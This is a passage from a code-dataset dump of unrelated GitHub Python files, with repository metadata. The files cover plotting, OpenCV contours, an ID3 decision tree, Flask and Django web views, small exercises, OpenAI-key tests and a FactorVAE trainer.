with K=8', '\"future\" strategy with K=4', '\"future\" strategy with K=8']\n\t##graph5\n\t# label_names = ['Unprioritized Actors', '1 Actor Exploring - 1 Actor Exploiting', 'Both Actors Exploiting', 'Dynamic Actors']\n\t##graph6\n\t# label_names = ['Memory= 10000, Batch Size = 2', 'Memory= 10000, Batch Size = 8', 'Memory= 50000, Batch Size = 2', 'Memory= 50000, Batch Size = 8', 'Memory= 50000, Batch Size = 64']\n\t##graph8\n\tlabel_names = ['Vanilla-DDPG','DDPG+PER','DDPG+HER','DDPG+PHER','DDPG+DPHER']\n\t# graph_12\n\t# label_names = ['Memory= 5000, Batch 
Size = 32', 'Memory= 10000, Batch Size = 2', 'Memory= 10000, Batch Size = 8', 'Memory= 50000, Batch Size = 2', 'Memory= 50000, Batch Size = 8', 'Memory= 50000, Batch Size = 64']\n\n\tplt.clf()\n\tplot_handles = []\n\tf = open(path,'r')\n\tfor i, (exp_name,label_name) in enumerate(zip(f.readlines(), label_names)):\n\t\tif(exp_name!=\"\\n\"):\n\t\t\texp_path = os.path.join(\"data\", exp_name)\n\t\t\tplot = plot_af(exp_path[:-1], plot_what='success', plot_num=i,label=label_name)\n\t\t\tif plot!=None:\n\t\t\t\tplot_handles.append(plot)\n\n\tplt.xlabel('EPOCHS',size=14)\n\tplt.ylabel('Accuracy',size=14)\n\tplt.legend(handles=plot_handles, loc=4, prop={'size': 8})\n\tplt.savefig(path[:-4]+'.png', bbox_inches='tight', dpi=300)\n","repo_name":"ojasjoshi/distributive-prioritised-hindsight-experience-replay","sub_path":"core_distributive/rl/check_json.py","file_name":"check_json.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"23230050297","text":"from cvp.utils.image_utils import show\nfrom cvp.shape.countours import get_contours_from_thresh, get_extreme_points\nfrom cvp.utils.parsing_utils import get_single_image_from_command_line\nimport cv2.cv2 as cv\n\n\ndef main():\n image = get_single_image_from_command_line()\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n blurred = cv.GaussianBlur(gray, (5, 5), 0)\n thresh = cv.threshold(blurred, 50, 255, cv.THRESH_BINARY)[1]\n eroded = cv.erode(thresh, None, iterations=2)\n diluted = cv.dilate(eroded, None, iterations=2)\n show(diluted)\n\n contours = get_contours_from_thresh(diluted)\n max_contour = max(contours, key=cv.contourArea)\n cv.drawContours(image, [max_contour], -1, (255, 255, 255), 2)\n\n ext_bot, ext_left, ext_right, ext_top = get_extreme_points(max_contour)\n\n cv.circle(image, ext_left, 8, (255, 0, 0), -1)\n cv.circle(image, ext_right, 8, (0, 255, 0), -1)\n cv.circle(image, ext_top, 8, (0, 0, 255), -1)\n cv.circle(image, ext_bot, 8, (255, 255, 0), -1)\n show(image)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"doron-st/computer-vision","sub_path":"cvp/applications/extreme_points_of_contour.py","file_name":"extreme_points_of_contour.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25279071715","text":"from typing import List, Union\nimport numpy as np\nfrom networkx import DiGraph\nfrom pandas import DataFrame, Series\n\nfrom generics import GenericNode, GenericClass, GenericModel\n\n\nclass Id3Node(GenericNode):\n pass\n\n\nclass Id3Class(GenericClass, Id3Node):\n pass\n\n\nclass Id3Model(GenericModel[Id3Node]):\n def _browse_tree(self, node: Id3Node, attributes: Series):\n edges = self.tree.out_edges(node, 'value')\n candidates = [child for p, child, value in edges if value == attributes[node.name]]\n\n if len(candidates) == 0:\n raise AttributeError(\n \"no candidate for {} in the given series with the value {}\".format(node.name, attributes[node.name])\n )\n\n successor = candidates[0]\n\n if type(successor) == Id3Class:\n return successor.value\n\n return self._browse_tree(successor, attributes)\n\n\ndef generate_id3_tree(data: DataFrame):\n tree = DiGraph(directed=True)\n root = next_node(data, tree)\n return Id3Model(tree, root)\n\n\ndef next_node(data: DataFrame, tree: DiGraph) -> [Id3Node]:\n # for now we assume that there is data\n rows, cols_count = data.shape\n\n if rows == 0: # impossible cas but for 
security\n return None\n if np.unique(data.iloc[:, -1].values).size == 1:\n return Id3Class(data.columns[-1], data.iloc[0, -1])\n\n # gather gains\n gains = [information_gain(data.to_numpy(), a) for a in range(0, cols_count-1)]\n # find the index of the column with best gain\n a = gains.index(max(gains))\n # retrieve column name from the column index\n column = data.columns[a]\n # get all possible values of the attribute and remove duplicates\n edges = set(data.iloc[:, a])\n # create a node for the actual attribute\n node = Id3Node(column, edges)\n tree.add_node(node)\n\n for edge in edges:\n subset = drop_attribute_value(data, column, edge)\n # Continue recursive generation of the tree\n child = next_node(subset, tree)\n node.child[edge] = child\n tree.add_edge(node, child, value=edge)\n\n return node\n\n\ndef drop_attribute_value(df, attribute, value):\n # Get index of rows that don't match the edge\n indexes = df[df[attribute] != value].index\n # Remove those rows\n subset = df.drop(indexes)\n # Remove attribute\n subset.drop(columns=attribute, inplace=True)\n return subset\n\n\ndef split_dataset(dataset: np.ndarray, index, as_dict=False) -> Union[dict, List[np.ndarray]]:\n \"\"\"\n Extract subsets by splitting the dataset for each value of the attribute\n at the specified index. Either an attribute or the class\n :param dataset: The dataset to slit\n :param index: the index of the attribute to split upon (or -1 for the class)\n :param as_dict: Either to return a dict with the attribute value as key or the array without attributes value\n :return: subsets as np.ndarray\n :rtype: np.ndarray[] is as_dict equals to false, dict otherwise\n \"\"\"\n classes = set(dataset[:, index])\n result = [dataset[dataset[:, index] == class_] for class_ in classes]\n if as_dict:\n return dict(zip(classes, result))\n else:\n return result\n\n\ndef entropy(dataset: np.ndarray):\n \"\"\"\n Compute the entropy of the dataset based on a measure of the amount of uncertainty in the dataset.\n :param dataset: The dataset to analyse\n :return: float\n \"\"\"\n rows, cols = dataset.shape\n classes_subsets = split_dataset(dataset, -1)\n proportions = [float(subset.shape[0]) / rows for subset in classes_subsets]\n return sum([-px * np.log2(px) for px in proportions])\n\n\ndef information_gain(dataset: np.ndarray, attribute):\n \"\"\"\n Compute the information gain based on the measure of the difference in entropy from before to after the dataset is\n split on the attribute\n :param dataset: The dataset to analyse\n :param attribute: The attribute to split upon\n :return: float\n \"\"\"\n rows, cols = dataset.shape\n subsets = split_dataset(dataset, attribute)\n h = entropy(dataset)\n return h - sum([float(subset.shape[0]) / rows * entropy(subset) for subset in subsets])\n","repo_name":"nowtryz/Decision-Tree","sub_path":"src/id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41665077674","text":"from backend.services import *\nfrom flask import render_template, request, make_response, redirect, url_for\n\n\n# app - Flask app object\n# registering endpoints from controllers with methods\ndef registerEndpoints(app):\n app.add_url_rule('/login', view_func=UsersController.login, methods=[\"POST\", \"GET\"])\n app.add_url_rule('/logout', view_func=UsersController.logout, methods=[\"GET\"])\n app.add_url_rule('/register', view_func=UsersController.register, methods=[\"POST\", \"GET\"])\n 
app.add_url_rule('/', view_func=PoemsController.mainPage, methods=['GET'])\n app.add_url_rule('/author/', view_func=PoemsController.authorPage, methods=['GET'])\n app.add_url_rule('/user/', view_func=PoemsController.userAuthorPage, methods=['GET'])\n app.add_url_rule('/poem/', view_func=PoemsController.poemPage, methods=['GET', 'POST'])\n app.add_url_rule('/add', view_func=PoemsController.addPoem, methods=['GET', 'POST'])\n app.add_url_rule('/daily', view_func=PoemsController.dailyPoem, methods=['GET'])\n app.add_url_rule('/daily_personal', view_func=PoemsController.dailyPersonalPoem, methods=['GET'])\n app.add_url_rule('/author', view_func=PoemsController.authorsPage, methods=['GET'])\n app.add_url_rule('/poem//opinion', view_func=PoemsController.addOpinion, methods=['GET', 'POST'])\n app.add_url_rule('/search', view_func=PoemsController.searchPoems, methods=['GET', 'POST'])\n app.add_url_rule('/fav/add/', view_func=PoemsController.addToFavourites, methods=['GET'])\n app.add_url_rule('/fav/remove/', view_func=PoemsController.removeFromFavourites, methods=['GET'])\n app.add_url_rule('/fav', view_func=PoemsController.favouritePoems, methods=['GET'])\n\n\nclass UsersController:\n __service = UsersService()\n\n # check if request have token in cookies\n @staticmethod\n def checkToken(r):\n token = r.cookies.get('token')\n return UsersController.__service.checkToken(token)[0]\n\n # on GET - get login view\n # on POST - login with given login and password, get token in response\n @staticmethod\n def login():\n if request.method == 'GET':\n return render_template('login.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n # if user send \"login form\" login to service and return token\n if request.form.get('submit') == 'login':\n user, password = request.form.get('login'), request.form.get('password')\n try:\n token = UsersController.__service.login(user, password)\n resp = make_response(redirect(url_for('mainPage', logged=UsersController.checkToken(request))))\n resp.set_cookie('token', token)\n return resp\n except Unauthorized as e:\n return UsersController.error(str(e), request)\n # if user send \"register form\" return register view\n elif request.form.get('submit') == 'register':\n return redirect(url_for('register', logged=UsersController.checkToken(request)))\n\n # logout from service\n @staticmethod\n def logout():\n if request.method == 'GET':\n # if request doesnt have token then redirect to login page\n token = request.cookies.get('token')\n if token is None:\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n UsersController.__service.logout(token)\n resp = make_response(redirect(url_for('mainPage', logged=False)))\n resp.delete_cookie('token')\n return resp\n\n # GET - return register view\n # POST - register new account or return login view\n @staticmethod\n def register():\n if request.method == 'GET':\n return render_template('register.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n if request.form.get('submit') == 'login':\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n elif request.form.get('submit') == 'register':\n user, password = request.form.get('login'), request.form.get('password')\n try:\n UsersController.__service.createNewUser(user, password)\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n # rendering error page with given 
message\n # r - request to check token\n @staticmethod\n def error(message, r):\n return render_template('error.html', message=message, logged=UsersController.checkToken(r))\n\n\nclass PoemsController:\n __service = PoemsService()\n\n # render main page\n @staticmethod\n def mainPage():\n poems = PoemsController.__service.getMainPagePoems()\n return render_template('index.html', poems=poems, logged=UsersController.checkToken(request))\n\n # render page with poems list of given authors\n @staticmethod\n def authorPage(author):\n try:\n author, poems = PoemsController.__service.getAuthorPoemsPreviews(author)\n except ValueError as e:\n return UsersController.error(str(e), request)\n return render_template('author_page.html', poems=poems, author=author,\n logged=UsersController.checkToken(request))\n\n # render page with poems list of given user-author\n @staticmethod\n def userAuthorPage(author):\n try:\n author, poems = PoemsController.__service.getUserPoemsPreviews(author)\n except ValueError as e:\n return UsersController.error(str(e), request)\n return render_template('author_page.html', poems=poems, author=author,\n logged=UsersController.checkToken(request))\n\n # return view page od given poem (by id)\n @staticmethod\n def poemPage(id):\n if request.method == 'GET':\n poem = PoemsController.__service.getPoem(id)\n token = request.cookies.get('token')\n isFav = PoemsController.__service.isFavourite(token, id)\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request), isFav=isFav)\n\n # GET - get view of add opinion form\n # POST - add new opinion\n @staticmethod\n def addOpinion(id):\n if request.method == 'GET':\n return render_template('add_opinion_page.html', id=id, logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n # check token\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n\n try:\n PoemsController.__service.addOpinion(id, request.cookies.get('token'),\n request.form.get('content'), request.form.get('rating'))\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n poem = PoemsController.__service.getPoem(id)\n\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def addPoem():\n if request.method == 'GET':\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n return render_template('add_poem_page.html', logged=UsersController.checkToken(request))\n elif request.method == 'POST':\n if not UsersController.checkToken(request):\n return redirect(url_for('login', logged=UsersController.checkToken(request)))\n author = request.form.get('author')\n isUserAuthor = request.form.get('isUserAuthor') == 'on'\n title = request.form.get('title')\n content = request.form.get('content')\n try:\n PoemsController.__service.addPoem(request.cookies.get('token'), author, title, content, isUserAuthor)\n except ValueError as e:\n return UsersController.error(str(e), request)\n\n return redirect(url_for('addPoem', logged=UsersController.checkToken(request)))\n\n @staticmethod\n def dailyPoem():\n poem = PoemsController.__service.getDailyPoem()\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def dailyPersonalPoem():\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n poem = 
PoemsController.__service.getDailyPoem(token=token)\n return render_template('poem_page.html', poem=poem, logged=UsersController.checkToken(request))\n\n @staticmethod\n def authorsPage():\n authors = PoemsController.__service.getAuthors()\n return render_template('authors.html', authors=authors, logged=UsersController.checkToken(request))\n\n @staticmethod\n def searchPoems():\n title = ''\n if request.method == 'GET':\n title = ''\n elif request.method == 'POST':\n title = request.form.get('title')\n poems = PoemsController.__service.searchPoem(title)\n return render_template('searching_page.html', poems=poems, logged=UsersController.checkToken(request))\n\n @staticmethod\n def addToFavourites(id):\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n PoemsController.__service.addToFavourites(token, id)\n return redirect(url_for('poemPage', id=id))\n\n @staticmethod\n def removeFromFavourites(id):\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n PoemsController.__service.removeFromFavourites(token, id)\n return redirect(url_for('poemPage', id=id))\n\n @staticmethod\n def favouritePoems():\n token = request.cookies.get('token')\n\n if token is None:\n return redirect(url_for('login'))\n\n poems = PoemsController.__service.getFavouritePoems(token)\n return render_template('favourite_poems.html', poems=poems, logged=UsersController.checkToken(request))","repo_name":"meex28/poems-jezyki-skryptowe","sub_path":"backend/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70880033104","text":"\"\"\"\nCP1404/CP5632 Practical\nStarter code for cumulative total income program\n\nName: Kum King Wye\nGithub link: https://github.com/kkw123/CP1404Practicals\n\"\"\"\n\n\ndef main():\n \"\"\"Ask how many months and the income for each month\"\"\"\n incomes = []\n total_months = int(input(\"How many months? 
\"))\n\n for month in range(1, total_months + 1):\n income = float(input(\"Enter income for month {}: \".format(str(month))))\n incomes.append(income)\n\n print_report(total_months, incomes)\n\n\ndef print_report(total_months, incomes):\n \"\"\"Display income report\"\"\"\n print(\"\\nIncome Report\\n-------------\")\n total = 0\n for month in range(1, total_months + 1):\n income = incomes[month - 1]\n total += income\n print(\"Month {:2} - Income: ${:10.2f} Total: ${:10.2f}\".format(month, income, total))\n\n\nmain()\n","repo_name":"kkw123/CP1404Practicals","sub_path":"Week 4 Files/total_income.py","file_name":"total_income.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35857943189","text":"from glob import glob\n\nimport re\n\nfrom author_class import Author\nfrom util import value_question\n\n\nclass HeaderAdder:\n def __init__(self):\n self.__authors = self.__get_authors_from_user()\n self.__email = self.__get_email_from_user()\n self.__credits = self.__get_credits_from_user()\n \n def add_headers(self, path):\n python_files = glob(path + '/*.py')\n if len(python_files) == 0:\n print('No python files found!')\n exit(1)\n self.__add_headers_to_files(python_files)\n\n def __add_headers_to_files(self, python_files):\n for file in python_files:\n with open(file, 'r+') as f:\n content_lines = f.read().splitlines()\n if len(content_lines) == 0:\n print(f'File \"{file}\" is empty!')\n continue\n if not self.__does_file_has_docstring(content_lines):\n print(f'File \"{file}\" has no docstring!')\n index_after_imports = self.__index_for_variables(content_lines)\n content_before_vars = content_lines[:index_after_imports]\n content_after_vars = content_lines[index_after_imports:]\n vars_content = ['', ''] + self.__construct_variables().split('\\n')\n new_content = content_before_vars + vars_content + content_after_vars\n f.seek(0, 0)\n f.write('\\n'.join(new_content))\n\n def get_authors(self):\n return self.__authors\n\n def __get_authors_from_user(self):\n num_authors = int(value_question('How many authors were working on this project?', type='int', default=1))\n if num_authors < 1:\n exit(1)\n authors = []\n for i in range(1, num_authors + 1):\n print(f'Please enter the information for the {i}. author:')\n matrikel = value_question('Matrikelnumber: ')\n surname = value_question('Surname: ')\n name = value_question('Lastname: ')\n authors.append(Author(matrikel, name, surname))\n return authors\n \n def __get_email_from_user(self):\n return value_question('What is your email? 
')\n\n def __get_credits_from_user(self):\n return value_question('If you want to add credits, enter them here:', default=\"\")\n\n def __read_file(self, path: str):\n with open(path, 'r+') as f:\n return f.read()\n\n def __construct_variables(self):\n vars = '__author__ = \"{}\"\\n' .format(self.__build_author())\n vars += '__copyright__ = \"{}\"\\n'.format(self.__get_copyright())\n vars += '__credits__ = \"{}\"\\n' .format(self.__credits) if self.__credits else ''\n vars += '__email__ = \"{}\"\\n' .format(self.__email)\n return vars\n\n def __build_author(self):\n author_strings = list(map(lambda a: f\"{a.matrikel}: {a.surname} {a.name}\", self.__authors))\n return ', '.join(author_strings)\n\n def __get_copyright(self):\n return \"Copyright 2017/2018 – EPR-Goethe-Uni\"\n\n def __index_for_variables(self, content_lines: [str]):\n index = 0\n for i, line in enumerate(content_lines):\n line = line.strip()\n if re.match('^(import|from)\\s', line) is not None:\n index = i\n # if there is no import/from statement\n if index == 0:\n if self.__does_file_has_docstring(content_lines):\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\').*(\\\"\\\"\\\"|\\'\\'\\')', content_lines[0].strip()) is not None:\n return 1\n docstring_indexes = [i for i, l in enumerate(content_lines)\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\')', l.strip()) is not None]\n return docstring_indexes[1] + 1\n return 0\n return index + 1\n\n def __does_file_has_docstring(self, content_lines: [str]):\n for line in content_lines:\n line = line.strip()\n if re.match('^(\\\"\\\"\\\"|\\'\\'\\')', line) is not None:\n return True\n if line != \"\":\n return False\n","repo_name":"larsgroeber/prg1","sub_path":"Tools/header_adder.py","file_name":"header_adder.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13838410188","text":"import sys\r\ninput=sys.stdin.readline\r\nfrom collections import deque\r\n\r\ndef bfs(x):\r\n q=deque()\r\n vis=[0]*(n)\r\n vis[x]=1\r\n q.append(x)\r\n while q:\r\n xx=q.pop()\r\n nx1, nx2 = xx+g[xx], xx-g[xx]\r\n if 0<=nx1\\d+)/$', self.wrapper(self.list_view), \n name=self.get_list_url_name),\n url(r'^add/(?P\\d+)/$', self.wrapper(self.add_view), \n name=self.get_add_url_name),\n ]\n patterns.extend(self.extra_urls())\n return patterns\n \n def get_queryset(self, request, *args, **kwargs):\n customer_id = kwargs.get('customer_id')\n current_user_id = request.session['user_info']['id']\n return self.model_class.objects.filter(customer_id=customer_id, \n customer__consultant_id=current_user_id)\n\n def get_model_form_class(self, is_add, request, pk, *args, **kwargs):\n # 如果当前客户有学员信息,则使用PaymentRecordModelForm;\n # 否则使用StudentPaymentRecordModelForm\n customer_id = kwargs.get('customer_id')\n student_exists = Student.objects.filter(\n customer_id=customer_id).exists()\n if student_exists:\n return PaymentRecordModelForm\n return StudentPaymentRecordModelForm\n\n def save(self, request, form, is_update, *args, **kwargs):\n customer_id = kwargs.get('customer_id')\n current_user_id = request.session['user_info']['id']\n obj_exists = Customer.objects.filter(id=customer_id, \n consultant_id=current_user_id).exists()\n if not obj_exists:\n return HttpResponse('非法操作')\n form.instance.customer_id = customer_id\n form.instance.consultant_id = current_user_id\n # 创建缴费记录信息\n form.save()\n # 创建学员信息\n class_list = form.cleaned_data['class_list']\n fetch_student_obj = Student.objects.filter(\n customer_id=customer_id).first()\n if not 
fetch_student_obj:\n qq = form.cleaned_data['qq']\n mobile = form.cleaned_data['mobile']\n emergency_contract = form.cleaned_data['emergency_contract']\n student_obj = Student.objects.create(\n customer_id=customer_id, qq=qq, mobile=mobile, \n emergency_contract=emergency_contract)\n student_obj.class_list.add(class_list.id)\n else:\n fetch_student_obj.class_list.add(class_list.id)\n","repo_name":"ohoo2454/shiyanlou-code","sub_path":"frontend_backend_projects/django1_project/web/views/payment_record.py","file_name":"payment_record.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22702872162","text":"import io\nimport logging\nimport os\nimport sys\nfrom unittest.mock import patch\n\nimport openai\nimport pytest\n\nfrom fukkatsu.llm.openaigate import reset_openai_key, set_openai_key\nfrom fukkatsu.observer.tracker import track\n\n\n@pytest.fixture\ndef captured_output():\n captured_output = io.StringIO()\n sys.stdout = captured_output\n yield captured_output\n sys.stdout = sys.__stdout__\n\n\ndef test_set_openai_key_with_api_key():\n with patch.dict(os.environ, {\"OPENAI_API_KEY\": \"test_key\"}):\n set_openai_key()\n assert openai.api_key == \"test_key\"\n assert \"OPENAI_API_KEY\" in os.environ\n\n\ndef test_set_openai_key_without_api_key(captured_output):\n handler = logging.StreamHandler(captured_output)\n track.addHandler(handler)\n with patch(\"os.environ.get\") as import_module_mock:\n import_module_mock.side_effect = Exception\n set_openai_key()\n output = captured_output.getvalue().strip()\n assert \"OPENAI_API_KEY not found\" in output\n\n\ndef test_overwrite_openai_key():\n with patch.dict(os.environ, {\"OPENAI_API_KEY\": \"test_key\"}):\n reset_openai_key(\"new_key\")\n assert openai.api_key == \"new_key\"\n\n\ndef test_overwrite_openai_key_error():\n with pytest.raises(\n Exception, match=\"Invalid Key format. OPENAI_API_KEY not overwritten.\"\n ):\n reset_openai_key(23)\n","repo_name":"maxmekiska/fukkatsu","sub_path":"tests/test_llm/test_openaigate.py","file_name":"test_openaigate.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"37312251400","text":"import torch\nimport math\nimport os\nimport numpy as np\nimport torch.optim as optim\nfrom collections import OrderedDict\nfrom model.losses import *\nfrom utils.utils_ import print_current_loss\nimport time\nfrom VaeTrainer import VaeTrainer\n\nclass FactorTrainer(VaeTrainer):\n\tdef __init__(self, args, batch_sampler, device, stage, cross_entropy_loss=False):\n\t\tsuper(FactorTrainer, self).__init__(args, batch_sampler, device, stage, cross_entropy_loss, None)\n\t\tself.dis_cri = torch.nn.BCELoss()\n\t\n\tdef sample_batch(self):\n\t\tif self.batch_enumerator is None:\n\t\t\tself.batch_enumerator = enumerate(self.batch_sampler)\n\t\t\n\t\tbatch_idx, batch = next(self.batch_enumerator)\n\t\t\n\t\tif batch_idx == len(self.batch_sampler) - 1:\n\t\t\tself.batch_enumerator = enumerate(self.batch_sampler)\n\t\t# self.real_batch = batch # ?? 
have not used\n\t\treturn batch\n\t\n\tdef permute_dims(self, z):\n\t\tassert z.dim() == 2\n\n\t\tB, _ = z.size()\n\t\tperm_z = []\n\t\tfor z_j in z.split(1, 1):\n\t\t\tperm = torch.randperm(B).to(z.device)\n\t\t\tperm_z_j = z_j[perm]\n\t\t\tperm_z.append(perm_z_j)\n\n\t\treturn torch.cat(perm_z, 1)\n\t\n\tdef train(self, encoder, decoder, disc, opt_encoder, opt_decoder, opt_disc, sample_true):\n\t\topt_encoder.zero_grad()\n\t\topt_decoder.zero_grad()\n\t\topt_disc.zero_grad()\n\t\t\n\t\tdata1 = sample_true()\n\t\tdata1 = torch.clone(data1).float().detach_().to(self.device)\n\t\t\n\t\tlog_dict = OrderedDict({\"g_loss\": 0})\n\t\t\n\t\tkld_loss = 0\n\t\tgen_loss = 0\n\t\tshuffle_loss = 0\n\t\tgan_loss = 0\n\t\t\n\t\tmu_z, sd_z, logsd_z, z = encoder(data1)\n\t\tz_sh = self.permute_dims(z).detach()\n\t\tx_sh_hat, _, _ = decoder(z_sh)\n\t\tx_sh_hat = x_sh_hat.detach()\n\t\t\n\t\tdisc_gt = disc(data1)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(1)\n\t\terrD_real = self.dis_cri(disc_gt, labelv)\n\t\t\n\t\tdisc_fake = disc(x_sh_hat)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(0)\n\t\terrD_fake = self.dis_cri(disc_fake, labelv)\n\t\t\n\t\tgan_loss += errD_real + errD_fake\n\t\t\n\t\tgan_loss.backward()\n\t\topt_disc.step()\n\t\tdata1 = sample_true()\n\t\tdata1 = torch.clone(data1).float().detach_().to(self.device)\n\n\t\tmu_z, sd_z, logsd_z, z = encoder(data1)\n\t\tx_hat, loggamma_x, gamma_x = decoder(z)\n\t\tz_sh = self.permute_dims(z).detach()\n\t\tx_sh_hat, _, _ = decoder(z_sh)\n\t\t\n\t\t# print(self.args.batch_size)\n\t\tkld_loss += self.kld_loss(mu_z, logsd_z) \n\t\tgen_loss += self.gen_loss(data1, x_hat, loggamma_x)\n\t\t\n\t\tx_sh_hat = x_sh_hat.detach()\n\t\tdisc_fake = disc(x_sh_hat)\n\t\tlabelv = torch.FloatTensor(self.args.batch_size).to(self.device)\n\t\tlabelv.resize_(self.args.batch_size).fill_(0)\n\t\tshuffle_loss += self.dis_cri(disc_fake, labelv)\n\t\t\n\t\tlosses = (kld_loss + gen_loss) / self.args.batch_size + self.args.alpha_gan * shuffle_loss\n\t\tlosses.backward()\n\t\topt_encoder.step()\n\t\topt_decoder.step()\n\t\topt_disc.step()\n\n\t\tavg_loss = losses.item()\n\t\tlog_dict[\"g_kld_loss\"] = kld_loss.item()\n\t\tlog_dict[\"g_gen_loss\"] = gen_loss.item()\n\t\tlog_dict[\"g_gan_loss\"] = gan_loss.item()\n\t\tlog_dict[\"g_shuffle_loss\"] = shuffle_loss.item()\n\t\tlog_dict[\"g_loss\"] = avg_loss\n\t\t\n\t\treturn log_dict\n\t\n\tdef trainIters(self, encoder, decoder, discriminator):\n\t\tself.opt_encoder = optim.Adam(\n\t\t\tencoder.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\tself.opt_decoder = optim.Adam(\n\t\t\tdecoder.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\tself.opt_disc = optim.Adam(\n\t\t\tdiscriminator.parameters(),\n\t\t\tlr = self.args.lr,\n\t\t\tbetas = (0.9, 0.999),\n\t\t\tweight_decay = 0.00001,\n\t\t)\n\t\t\n\t\tencoder.to(self.device)\n\t\tdecoder.to(self.device)\n\t\tdiscriminator.to(self.device)\n\t\t\n\t\tdef save_model(file_name):\n\t\t\tstate = {\n\t\t\t\t\"encoder\": encoder.state_dict(),\n\t\t\t\t\"decoder\": decoder.state_dict(),\n\t\t\t\t\"discriminator\": discriminator.state_dict(),\n\t\t\t\t\"opt_encoder\": self.opt_encoder.state_dict(),\n\t\t\t\t\"opt_decoder\": self.opt_decoder.state_dict(),\n\t\t\t\t\"opt_discriminator\": 
self.opt_disc.state_dict(),\n\t\t\t\t\"iterations\": iter_num,\n\t\t\t}\n\t\t\tfilename = \"s\" + str(self.stage) + \"_\" + file_name\n\t\t\t\n\t\t\ttorch.save(state, os.path.join(self.args.model_path, filename) + \".tar\")\n\t\t\n\t\tdef load_model(file_name):\n\t\t\tfilename = \"s\" + str(self.stage) + \"_\" + file_name\n\t\t\tmodel_dict = torch.load(os.path.join(self.args.model_path, filename + \".tar\"))\n\t\t\t\n\t\t\tencoder.load_state_dict(model_dict[\"encoder\"])\n\t\t\tdecoder.load_state_dict(model_dict[\"decoder\"])\n\t\t\tdiscriminator.load_state_dict(model_dict[\"discriminator\"])\n\t\t\tself.opt_encoder.load_state_dict(model_dict[\"opt_encoder\"])\n\t\t\tself.opt_decoder.load_state_dict(model_dict[\"opt_decoder\"])\n\t\t\tself.opt_disc.load_state_dict(model_dict[\"opt_discriminator\"])\n\t\t\treturn model_dict\n\t\t\n\t\titer_num = 0\n\t\tlogs = OrderedDict()\n\t\tstart_time = time.time()\n\t\tlast_time = start_time\n\t\t\n\t\tif self.args.is_continue:\n\t\t\tmodel_dict = load_model(\"latest\")\n\t\t\titer_num = model_dict[\"iterations\"]\n\t\t\n\t\twhile True:\n\t\t\tencoder.train()\n\t\t\tdecoder.train()\n\t\t\tdiscriminator.train()\n\t\t\t\n\t\t\tif self.stage == 1:\n\t\t\t\tsample_true = self.sample_batch1\n\t\t\telse:\n\t\t\t\tsample_true = self.sample_batch2\n\n\t\t\tgen_log_dict = self.train(\n\t\t\t\tencoder,\n\t\t\t\tdecoder,\n\t\t\t\tdiscriminator,\n\t\t\t\tself.opt_encoder,\n\t\t\t\tself.opt_decoder,\n\t\t\t\tself.opt_disc,\n\t\t\t\tsample_true\n\t\t\t)\n\t\t\t\n\t\t\tfor k, v in gen_log_dict.items():\n\t\t\t\tif k not in logs:\n\t\t\t\t\tlogs[k] = [v]\n\t\t\t\telse:\n\t\t\t\t\tlogs[k].append(v)\n\t\t\t\n\t\t\titer_num += 1\n\t\t\t\n\t\t\tif iter_num % self.args.print_every == 0:\n\t\t\t\tmean_loss = OrderedDict()\n\t\t\t\tfor k, v in logs.items():\n\t\t\t\t\tmean_loss[k] = (\n\t\t\t\t\t\tsum(logs[k][-1 * self.args.print_every:]) / self.args.print_every\n\t\t\t\t\t)\n\t\t\t\tcurrent_time = time.time()\n\t\t\t\tprint_current_loss(start_time, last_time, current_time, self.args.print_every, iter_num, self.args.epochs, mean_loss)\n\t\t\t\tlast_time = current_time\n\t\t\t\n\t\t\tif iter_num % self.args.save_every == 